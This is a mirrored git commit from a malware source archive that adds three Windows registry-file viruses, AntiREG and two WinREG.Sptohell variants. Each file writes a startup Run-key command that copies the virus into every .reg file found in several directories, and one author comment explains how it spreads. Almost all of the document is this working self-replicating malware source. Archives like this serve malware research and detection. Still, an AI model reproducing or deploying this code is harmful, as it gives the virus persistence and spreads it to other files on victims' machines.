mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Add files via upload
This commit is contained in:
parent
fc7f440e2c
commit
6f6b922ed1
13
Other/Virus.WinREG.Antireg.b
Normal file
13
Other/Virus.WinREG.Antireg.b
Normal file
@ -0,0 +1,13 @@
|
||||
REGEDIT4
|
||||
|
||||
;;-------------------------------;;
|
||||
;; ;;
|
||||
;; AntiREG (The First REG Virus) ;;
|
||||
;; Coded By Lys Kovick ;;
|
||||
;; Special Thanks To Phage ;;
|
||||
;; ;;
|
||||
;;-------------------------------;;
|
||||
|
||||
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
|
||||
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
24
Other/Virus.WinREG.Sptohell
Normal file
24
Other/Virus.WinREG.Sptohell
Normal file
@ -0,0 +1,24 @@
|
||||
REGEDIT 4
|
||||
|
||||
;; WinREG.Wow
|
||||
;; written by SeCoNd PaRt To HeLl
|
||||
;; for my Virus Database
|
||||
|
||||
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
|
||||
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
||||
;; Wow
|
||||
;; WowWow
|
||||
;; WowWowWow
|
||||
;; WowWowWowWow
|
||||
;; WowWowWowWowWow
|
||||
;; WowWowWowWowWowWow
|
||||
;; WowWowWowWowWowWowWow
|
||||
;; WowWowWowWowWowWowWowWow
|
||||
;; WowWowWowWowWowWowWow
|
||||
;; WowWowWowWowWowWow
|
||||
;; WowWowWowWowWow
|
||||
;; WowWowWowWow
|
||||
;; WowWowWow
|
||||
;; WowWow
|
||||
;; Wow
|
14
Other/Virus.WinREG.Sptohell.b
Normal file
14
Other/Virus.WinREG.Sptohell.b
Normal file
@ -0,0 +1,14 @@
|
||||
REGEDIT 4
|
||||
|
||||
;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- ***************
|
||||
;;
|
||||
;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
|
||||
;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
|
||||
;;
|
||||
;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
|
||||
;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
|
||||
;; itself (the code in the registry) to these .REG-files.
|
||||
|
||||
|
||||
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
|
||||
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
Loading…
Reference in New Issue
Block a user